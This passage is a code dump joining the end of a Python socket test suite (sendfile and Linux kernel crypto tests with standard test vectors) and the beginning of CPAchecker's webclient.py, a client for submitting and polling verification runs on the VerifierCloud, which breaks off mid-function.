with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
# Although it should work with 3.19 and newer the test blocks on
# Ubuntu 15.10 with Kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertTrue(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 9) # see issue29324
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
with self.create_alg('aead', 'gcm(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg) - taglen)
self.assertEqual(plain, res[assoclen:])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest, UDPTimeoutTest ]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.append(LinuxKernelCryptoAPI)
tests.extend([
BasicVSOCKTest,
ThreadedVSOCKSocketStreamTest,
])
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
webclient.py
|
"""
CPAchecker is a tool for configurable software verification.
This file is part of CPAchecker.
Copyright (C) 2007-2014 Dirk Beyer
All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
CPAchecker web page:
http://cpachecker.sosy-lab.org
"""
# prepare for Python 3
from __future__ import absolute_import, division, print_function, unicode_literals
import sys
sys.dont_write_bytecode = True # prevent creation of .pyc files
import base64
import fnmatch
import hashlib
import io
import logging
import os
import platform
import random
import tempfile
import threading
import zipfile
import zlib
from time import sleep
from time import time
import urllib.parse as urllib
import urllib.request as urllib2
from http.client import HTTPConnection
from http.client import HTTPSConnection
from concurrent.futures import ThreadPoolExecutor
from concurrent.futures import as_completed
from concurrent.futures import Future
try:
import sseclient # @UnresolvedImport
from requests import HTTPError
except:
pass
"""
This module provides helpers for accessing the web interface of the VerifierCloud.
"""
__all__ = [
'WebClientError', 'WebInterface', 'handle_result',
'MEMLIMIT', 'TIMELIMIT', 'SOFTTIMELIMIT', 'CORELIMIT',
'RESULT_FILE_LOG', 'RESULT_FILE_STDERR', 'RESULT_FILE_RUN_INFO', 'RESULT_FILE_HOST_INFO', 'RESULT_FILE_RUN_DESCRIPTION', 'SPECIAL_RESULT_FILES',
]
MEMLIMIT = 'memlimit'
TIMELIMIT = 'timelimit'
SOFTTIMELIMIT = 'softtimelimit'
CORELIMIT = 'corelimit'
RESULT_FILE_LOG = 'output.log'
RESULT_FILE_STDERR = 'stderr'
RESULT_FILE_RUN_INFO = 'runInformation.txt'
RESULT_FILE_HOST_INFO = 'hostInformation.txt'
RESULT_FILE_RUN_DESCRIPTION = 'runDescription.txt'
SPECIAL_RESULT_FILES = {RESULT_FILE_LOG, RESULT_FILE_STDERR, RESULT_FILE_RUN_INFO,
RESULT_FILE_HOST_INFO, RESULT_FILE_RUN_DESCRIPTION}
MAX_SUBMISSION_THREADS = 5
CONNECTION_TIMEOUT = 600 # seconds
HASH_CODE_CACHE_PATH = os.path.join(os.path.expanduser("~"), ".verifiercloud/cache/hashCodeCache")
class WebClientError(Exception):
def _init_(self, value):
self.value = value
def _str_(self):
return repr(self.value)
class AutoCloseHTTPConnection(HTTPConnection):
def __del__(self):
self.close()
logging.debug("Closed connection")
class AutoCloseHTTPSConnection(HTTPSConnection):
def __del__(self):
self.close()
logging.debug("Closed connection")
class PollingResultDownloader:
def __init__(self, web_interface, result_poll_interval, unfinished_runs={}):
self._unfinished_runs = set()
self._unfinished_runs_lock = threading.Lock()
self._web_interface = web_interface
self._result_poll_interval = result_poll_interval
self._state_poll_executor = ThreadPoolExecutor(max_workers=web_interface.thread_count)
self._state_poll_thread = threading.Thread(target=self._poll_run_states, name='web_interface_state_poll_thread')
self._shutdown = threading.Event()
def _poll_run_states(self):
# in every iteration the states of all unfinished runs are requested once
while not self._shutdown.is_set() :
start = time()
states = {}
with self._web_interface._unfinished_runs_lock:
for run_id in self._web_interface._unfinished_runs.keys():
state_future = self._state_poll_executor.submit(self._web_interface._is_finished, run_id)
states[state_future] = run_id
# Collect states of runs
for state_future in as_completed(states.keys()):
run_id = states[state_future]
state = state_future.result()
if state == "FINISHED" or state == "UNKNOWN":
self._web_interface._download_result_async(run_id)
elif state == "ERROR":
self._web_interface._run_failed(run_id)
end = time();
duration = end - start
if duration < self._result_poll_interval and not self._shutdown.is_set():
self._shutdown.wait(self._result_poll_interval - duration)
def start(self):
if (not self._shutdown.is_set()) and (not self._state_poll_thread.isAlive()):
logging.info("Starting polling of run states.")
self._state_poll_thread.start()
def shutdown(self):
self._shutdown.set()
if self._state_poll_thread.is_alive():
self._state_poll_thread.join()
self._state_poll_executor.shutdown(wait=True)
try:
class ShouldReconnectSeeClient(sseclient.SSEClient):
def __init__(self, url, should_reconnect, last_id=None, retry=3000, session=None, **kwargs):
super().__init__(url, last_id, retry, session, **kwargs)
self._should_reconnect = should_reconnect
def _connect(self):
(_, value, _) = sys.exc_info()
if (value is None or self._should_reconnect(value)):
super()._connect()
else:
raise StopIteration()
def __del__(self):
if hasattr(self, 'resp'):
self.resp.close()
class SseResultDownloader:
def __init__(self, web_interface, web_interface_url, result_poll_interval):
logging.debug("Server-Send Events are used to get state of runs.")
self._web_interface = web_interface
self._run_finished_url = web_interface_url + "runs/finished"
self._result_poll_interval = result_poll_interval
self._sse_client = None
self._shutdown = False
self._new_runs = False
self._state_receive_executor = ThreadPoolExecutor(max_workers=1)
def _log_future_exception_and_fallback(self, result):
if result.exception() is not None:
logging.warning('Error during result processing.', exc_info=True)
self._fall_back()
def _should_reconnect(self, error):
if self._new_runs:
return False
elif type(error) == HTTPError and error.response is not None \
and error.response.status >= 400 and error.response.status < 500 :
logging.debug("Exception in SSE connection: %s", error)
return False
else:
return True
def _start_sse_connection(self):
while(self._new_runs):
run_ids = set(self._web_interface._unfinished_runs.keys())
self._new_runs = False
# nothing to do
if len(run_ids) == 0:
return
params = []
for run_id in run_ids:
params.append(("run", run_id))
headers = {}
headers["Accept-Encoding"] = "UTF-8"
if self._web_interface._base64_user_pwd:
headers["Authorization"] = "Basic " + self._web_interface._base64_user_pwd
for k, v in self._web_interface.default_headers.items():
if k not in headers:
headers[k] = v
logging.debug("Creating Server-Send Event connection.")
try:
self._sse_client = ShouldReconnectSeeClient(
self._run_finished_url, self._should_reconnect,
verify='/etc/ssl/certs',
headers=headers, data=params)
except Exception as e:
logging.warning("Creating SSE connection failed: %s", e)
self._fall_back()
return
for message in self._sse_client:
data = message.data
tokens = data.split(" ")
if len(tokens) == 2:
run_id = tokens[0]
state = tokens[1]
if state == "FINISHED":
if run_id in run_ids:
logging.debug('Run %s finished.', run_id)
self._web_interface._download_result_async(run_id)
elif state == "UNKNOWN":
logging.debug('Run %s is not known by the webclient, trying to get the result.', run_id)
self._web_interface._download_async(run_id)
elif state == "ERROR":
self._web_interface._run_failed(run_id)
else:
logging.warning('Received unknown run state %s for run %s.', state, run_id)
run_ids.discard(run_id)
if self._shutdown or self._new_runs or len(run_ids) == 0:
break;
else:
logging.warning("Received invalid message %s", data)
self._sse_client = None
# fall back to polling if Server-Send Event based approach failed
if len(run_ids) != 0 and not self._shutdown:
self._fall_back()
def _fall_back(self):
logging.info("Fall back to polling.")
self._web_interface._result_downloader = PollingResultDownloader(self._web_interface, self._result_poll_interval)
self._web_interface._result_downloader.start()
self.shutdown(wait=False)
def start(self):
self._new_runs = True
if self._sse_client:
self._sse_client.resp.close()
else:
future = self._state_receive_executor.submit(self._start_sse_connection)
future.add_done_callback(self._log_future_exception_and_fallback)
def shutdown(self, wait=True):
self._shutdown = True
if self._sse_client:
self._sse_client.resp.close()
self._state_receive_executor.shutdown(wait=wait)
except:
pass
class RunResultFuture(Future):
def __init__(self, web_interface, run_id):
super().__init__()
self._web_interface = web_interface
self._run_id = run_id
def cancel(self):
canceled = super().cancel()
if canceled:
try:
self._web_interface._stop_run(self._run_id)
except:
logging.warning("Stopping of run %s failed", self._run_id)
return canceled
class WebInterface:
"""
The WebInterface is a executor like class for the submission of runs to the VerifierCloud
"""
def __init__(self, web_interface_url, user_pwd, svn_branch='trunk', svn_revision='HEAD',
thread_count=1, result_poll_interval=2, user_agent=None, version=None):
"""
Creates a new WebInterface object.
The given svn revision is resolved (e.g. 'HEAD' -> 17495).
@param web_interface_url: the base URL of the VerifierCloud's web interface
@param user_pwd: user name and password in the format '<user_name>:<password>' or none if no authentification is required
@param svn_branch: the svn branch name or 'trunk', defaults to 'trunk'
@param svn_revision: the svn revision number or 'HEAD', defaults to 'HEAD'
@param thread_count: the number of threads for fetching results in parallel
@param result_poll_interval: the number of seconds to wait between polling results
"""
if not (1 <= thread_count <= MAX_SUBMISSION_THREADS):
sys.exit("Invalid number {} of client threads, needs to be between 1 and {}.".format(thread_count, MAX_SUBMISSION_THREADS))
if not 1 <= result_poll_interval:
sys.exit("Poll interval {} is too small, needs to be at least 1s.".format(result_poll_interval))
if not web_interface_url[-1] == '/':
web_interface_url += '/'
self.default_headers = {'Connection': 'Keep-Alive'}
if user_agent:
self.default_headers['User-Agent'] = \
'{}/{} (Python/{} {}/{})'.format(user_agent, version, platform.python_version(), platform.system(), platform.release())
self._webclient = urllib.urlparse(web_interface_url)
logging.info('Using VerifierCloud at %s', web_interface_url)
if user_pwd:
self._base64_user_pwd = base64.b64encode(user_pwd.encode("utf-8")).decode("utf-8")
else:
self._base64_user_pwd = None
self._unfinished_runs = {}
self._unfinished_runs_lock = threading.Lock()
self._downloading_result_futures = {}
self._download_attempts = {}
self.thread_count = thread_count
self._executor = ThreadPoolExecutor(thread_count)
self._thread_local = threading.local()
self._hash_code_cache = {}
self._group_id = str(random.randint(0, 1000000))
self._read_hash_code_cache()
self._resolved_tool_revision(svn_branch, svn_revision)
self._tool_name = self._request_tool_name()
try:
self._result_downloader = SseResultDownloader(self, web_interface_url, result_poll_interval)
except:
self._result_downloader = PollingResultDownloader(self, result_poll_interval)
def _read_hash_code_cache(self):
if not os.path.isfile(HASH_CODE_CACHE_PATH):
return
with open(HASH_CODE_CACHE_PATH, mode='r') as hashCodeCacheFile:
for line in hashCodeCacheFile:
tokens = line.strip().split('\t')
if len(tokens) == 3:
self._hash_code_cache[(tokens[0], tokens[1])] = tokens[2]
def _write_hash_code_cache(self):
directory = os.path.dirname(HASH_CODE_CACHE_PATH)
try:
os.makedirs(directory, exist_ok=True)
with tempfile.NamedTemporaryFile(dir=directory, delete=False) as tmpFile:
for (path, mTime), hashValue in self._hash_code_cache.items():
line = (path + '\t' + mTime + '\t' + hashValue + '\n').encode()
tmpFile.write(line)
os.renames(tmpFile.name, HASH_CODE_CACHE_PATH)
except OSError as e:
logging.warning("Could not write hash-code cache file to %s: %s", HASH_CODE_CACHE_PATH, e.strerror)
def _resolved_tool_revision(self, svn_branch, svn_revision):
path = self._webclient.path + "tool/version?svnBranch=" + svn_branch \
+ "&revision=" + svn_revision
(resolved_svn_revision, _) = self._request("GET", path)
self._svn_branch = svn_branch
self._svn_revision = resolved_svn_revision.decode("UTF-8")
def _request_tool_name(self):
path = self._webclient.path + "tool/name"
(tool_name, _) = self._request("GET", path)
return tool_name.decode("UTF-8")
def tool_revision(self):
return self._svn_branch + ':' + self._svn_revision
def tool_name(self):
return self._tool_name
def _get_sha1_hash(self, path):
path = os.path.abspath(path)
mTime = str(os.path.getmtime(path))
if ((path, mTime) in self._hash_code_cache):
return self._hash_code_cache[(path, mTime)]
else:
with open(path, 'rb') as file:
hashValue = hashlib.sha1(file.read()).hexdigest()
self._hash_code_cache[(path, mTime)] = hashValue
return hashValue
def _create_and_add_run_future(self, run_id):
result = RunResultFuture(self, run_id)
with self._unfinished_runs_lock:
self._unfinished_runs[run_id] = result
return result
def submit_witness_validation(self, witness_path, program_path, configuration=None, user_pwd=None):
"""
Submits a single witness validation run to the VerifierCloud.
@note: flush() should be called after the submission of the last run.
@param witness_path: path to the file containing the witness
@param program_path: path to the file containing the program
@param configuration: name of configuration (optional)
@param user_pwd: overrides the user name and password given in the constructor (optional)
"""
# collect parameters
params = {}
with open(witness_path, 'rb') as witness_file:
params['errorWitnessText'] = witness_file.read()
with open(program_path, 'rb') as program_file:
params['programText'] = program_file.read()
if configuration:
params['configuration'] = configuration
# prepare request
headers = {"Content-Type": "application/x-www-form-urlencoded",
"Content-Encoding": "deflate",
"Accept": "text/plain"}
paramsCompressed = zlib.compress(urllib.urlencode(params, doseq=True).encode('utf-8'))
path = self._webclient.path + "runs/witness_validation/"
(run_id, _) = self._request("POST", path, paramsCompressed, headers, user_pwd=user_pwd)
run_id = run_id.decode("UTF-8")
logging.debug('Submitted witness validation run with id %s', run_id)
return self._create_and_add_run_future(run_id)
def submit(self, run, limits, cpu_model, result_files_pattern, priority='IDLE', user_pwd=None, svn_branch=None, svn_revision=None):
"""
Submits a single run to the VerifierCloud.
@note: flush() should be called after the submission of the last run.
@param run: The input for the run: command line options (run.options),
source files (run.sourcefiles),
property file (run.propertyfile),
identifier for error messages (run.identifier)
@param limits: dict of limitations for the run (memlimit, timelimit, corelimit, softtimelimit)
@param cpu_model: substring of CPU model to use or 'None' for no restriction
@param result_files_pattern: the result is filtered with the given glob pattern, '**' is no restriction and None or the empty string do not match any file.
@param priority: the priority of the submitted run, defaults to 'IDLE'
@param user_pwd: overrides the user name and password given in the constructor (optional)
@param svn_branch: overrids the svn branch given in the constructor (optional)
@param svn_revision: overrides the svn revision given in the constructor (optional)
"""
return self._submit(run, limits, cpu_model, result_files_pattern, priority, user_pwd, svn_branch, svn_revision)
def _submit(self, run, limits, cpu_model, result_files_pattern, priority, user_pwd, svn_branch, svn_revision, counter=0):
programTextHashs = []
for programPath in run.sourcefiles:
programTextHashs.append(self._get_sha1_hash(programPath))
params = {'programTextHash': programTextHashs}
params['svnBranch'] = svn_branch or self._svn_branch
params['revision'] = svn_revision or self._svn_revision
if run.propertyfile:
with open(run.propertyfile, 'r') as propertyFile:
propertyText = propertyFile.read()
params['propertyText'] = propertyText
if MEMLIMIT in limits:
params['memoryLimitation'] = limits[MEMLIMIT]
if TIMELIMIT in limits:
params['timeLimitation'] = limits[TIMELIMIT]
if SOFTTIMELIMIT in limits:
params['softTimeLimitation'] = limits[SOFTTIMELIMIT]
if CORELIMIT in limits:
params['coreLimitation'] = limits[CORELIMIT]
if cpu_model:
params['cpuModel'] = cpu_model
if result_files_pattern:
params['resultFilesPattern'] = result_files_pattern;
else:
params['resultFilesPattern'] = ''
if priority:
params['priority'] = priority
invalidOption = self._handle_options(run, params, limits)
if invalidOption:
raise WebClientError('Command {0} contains option "{1}" that is not usable with the webclient. '\
.format(run.options, invalidOption))
params['groupId'] = self._group_id;
# prepare request
headers = {"Content-Type": "application/x-www-form-urlencoded",
"Content-Encoding": "deflate",
"Accept": "text/plain"}
paramsCompressed = zlib.compress(urllib.urlencode(params, doseq=True).encode('utf-8'))
path = self._webclient.path + "runs/"
(run_id, statusCode) = self._request("POST", path, paramsCompressed, headers, [200, 412], user_pwd)
# program files given as hash value are not known by the cloud system
if statusCode == 412 and counter < 1:
headers = {"Content-Type": "application/octet-stream",
"Content-Encoding": "deflate"}
# upload all used program files
filePath = self._webclient.path + "files/"
for programPath in run.sourcefiles:
with open(programPath, 'rb') as programFile:
compressedProgramText = zlib.compress(programFile.read(), 9)
self._request('POST', filePath, compressedProgramText, headers, [200, 204], user_pwd)
# retry submission of run
return self._submit(run, limits, cpu_model, result_files_pattern, priority, user_pwd, svn_branch, svn_revision, counter + 1)
else:
run_id = run_id.decode("UTF-8")
logging.debug('Submitted run with id %s', run_id)
return self._create_and_add_run_future(run_id)
def _handle_options(self, run, params, rlimits):
# TODO use code from CPAchecker module, it add -stats and sets -timelimit,
# instead of doing it here manually, too
options = []
specification_texts = []
if self._tool_name == "CPAchecker":
options.append("statistics.print=true")
if 'softtimelimit' in rlimits and not '-timelimit' in options:
options.append("limits.time.cpu=" + str(rlimits['softtimelimit']) + "s")
if run.options:
i = iter(run.options)
while True:
try:
option = next(i)
if len(option) == 0:
continue
if option == "-heap":
params['heap'] = next(i)
elif option == "-stack":
params['stack'] = next(i)
elif option == "-noout":
options.append("output.disable=true")
elif option == "-outputpath":
options.append("output.path=" + next(i))
elif option == "-logfile":
options.append("log.file=" + next(i))
elif option == "-nolog":
options.append("log.level=OFF")
options.append("log.consoleLevel=OFF")
elif option == "-stats":
# ignore, is always set by this script
pass
elif option == "-disable-java-assertions":
params['disableJavaAssertions'] = 'true'
elif option == "-java":
options.append("language=JAVA")
elif option == "-32":
options.append("analysis.machineModel=Linux32")
elif option == "-64":
options.append("analysis.machineModel=Linux64")
elif option == "-entryfunction":
options.append("analysis.entryFunction=" + next(i))
elif option == "-timelimit":
options.append("limits.time.cpu=" + next(i))
elif option == "-skipRecursion":
options.append("cpa.callstack.skipRecursion=true")
options.append("analysis.summaryEdges=true")
elif option == "-cbmc":
options.append("analysis.checkCounterexamples=true")
options.append("counterexample.checker=CBMC")
elif option == "-preprocess":
options.append("parser.usePreprocessor=true")
elif option == "-generateReport":
params['generateReport'] = 'true'
elif option == "-spec":
spec_path = next(i)
with open(spec_path, 'r') as spec_file:
file_text = spec_file.read()
if spec_path[-8:] == ".graphml":
params['errorWitnessText'] = file_text
elif spec_path[-4:] == ".prp":
params['propertyText'] = file_text
else:
specification_texts.append(file_text)
elif option == "-config":
configPath = next(i)
tokens = configPath.split('/')
if not (tokens[0] == "config" and len(tokens) == 2):
logging.warning('Configuration %s of run %s is not from the default config directory.',
configPath, run.identifier)
return configPath
config = tokens[1].split('.')[0]
params['configuration'] = config
elif option == "-setprop":
options.append(next(i))
elif option[0] == '-' and 'configuration' not in params :
params['configuration'] = option[1:]
else:
return option
except StopIteration:
break
params['option'] = options
params['specificationText'] = specification_texts
return None
def flush_runs(self):
"""
Starts the execution of all previous submitted runs in the VerifierCloud.
The web interface groups runs and submits them to the VerifierCloud only from time to time.
This method forces the web interface to do this immediately and starts downloading of results.
"""
headers = {"Content-Type": "application/x-www-form-urlencoded",
"Content-Encoding": "deflate",
"Connection": "Keep-Alive"}
params = {"groupId": self._group_id}
paramsCompressed = zlib.compress(urllib.urlencode(params, doseq=True).encode('utf-8'))
path = self._webclient.path + "runs/flush"
self._request("POST", path, paramsCompressed, headers, expectedStatusCodes=[200, 204])
self._result_downloader.start()
def _is_finished(self, run_id):
headers = {"Accept": "text/plain"}
path = self._webclient.path + "runs/" + run_id + "/state"
try:
(state, _) = self._request("GET", path, "", headers)
state = state.decode('utf-8')
if state == "FINISHED":
logging.debug('Run %s finished.', run_id)
if state == "UNKNOWN":
logging.debug('Run %s is not known by the webclient, trying to get the result.', run_id)
return state
except urllib2.HTTPError as e:
logging.warning('Could not get run state %s: %s', run_id, e.reason)
return False
def _download_result(self, run_id):
# download result as zip file
headers = {"Accept": "application/zip"}
path = self._webclient.path + "runs/" + run_id + "/result"
(zip_content, _) = self._request("GET", path, {}, headers)
return zip_content
def _download_result_async(self, run_id):
def callback(downloaded_result):
run_id = self._downloading_result_futures.pop(downloaded_result)
exception = downloaded_result.exception()
if not exception:
with self._unfinished_runs_lock:
result_future = self._unfinished_runs.pop(run_id, None)
if result_future:
result_future.set_result(downloaded_result.result())
else:
logging.info('Could not get result of run %s: %s', run_id, downloaded_result.exception())
# client error
if type(exception) is urllib2.HTTPError and 400 <= exception.code and exception.code <= 499:
attempts = self._download_attempts.pop(run_id, 1);
if attempts < 10:
self._download_attempts[run_id] = attempts + 1;
self._download_result_async(run_id)
else:
self._run_failed(run_id)
else:
# retry it
self._download_result_async(run_id)
if run_id not in self._downloading_result_futures.values(): # result is not downloaded
future = self._executor.submit(self._download_result, run_id)
self._downloading_result_futures[future] = run_id
future.add_done_callback(callback)
def _run_failed(self, run_id):
run_result_future = self._unfinished_runs.pop(run_id, None)
if run_result_future:
logging.warning('Execution of run %s failed.', run_id)
run_result_future.set_exception(WebClientError("Execution failed."))
def shutdown(self):
"""
Cancels all unfinished runs and stops all internal threads.
"""
self._result_downloader.shutdown()
if len(self._unfinished_runs) > 0:
logging.info("Stopping tasks on server...")
stop_executor = ThreadPoolExecutor(max_workers=5 * self.thread_count)
stop_tasks = set()
with self._unfinished_runs_lock:
for runId in self._unfinished_runs.keys():
stop_tasks.add(stop_executor.submit(self._stop_run, runId))
self._unfinished_runs[runId].set_exception(WebClientError("WebInterface was stopped."))
self._unfinished_runs.clear()
for task in stop_tasks:
task.result()
stop_executor.shutdown(wait=True)
logging.info("Stopped all tasks.")
self._write_hash_code_cache()
self._executor.shutdown(wait=True)
def _stop_run(self, run_id):
with self._unfinished_runs_lock:
self._unfinished_runs.pop(run_id, None)
path = self._webclient.path + "runs/" + run_id
try:
self._request("DELETE", path, expectedStatusCodes=[200, 204, 404])
except urllib2.HTTPError as e:
logging.info("Stopping of run %s failed: %s", run_id, e.reason)
def _request(self, method, path, body={}, headers={}, expectedStatusCodes=[200], user_pwd=None):
connection = self._get_connection()
if user_pwd:
base64_user_pwd = base64.b64encode(user_pwd.encode("utf-8")).decode("utf-8")
headers["Authorization"] = "Basic " + base64_user_pwd
elif self._base64_user_pwd:
headers["Authorization"] = "Basic " + self._base64_user_pwd
for k, v in self.default_headers.items():
if k not in headers:
headers[k] = v
counter = 0
while (counter < 5):
counter += 1
# send request
try:
connection.request(method, path, body=body, headers=headers)
response = connection.getresponse()
except Exception as e:
if (counter < 5):
logging.debug("Exception during %s request to %s: %s", method, path, e)
# create new TCP connection and try to send the request
connection.close()
sleep(1)
continue
else:
raise
if response.status in expectedStatusCodes:
return (response.read(), response.getcode())
else:
message = ""
if response.status == 401:
message = 'Error 401: Permission denied. Please check the URL given to --cloudMaster and specify credentials if necessary.'
elif response.status == 404:
message = 'Error 404: Not found. Please check the URL given to --cloudMaster.'
elif response.status == 503:
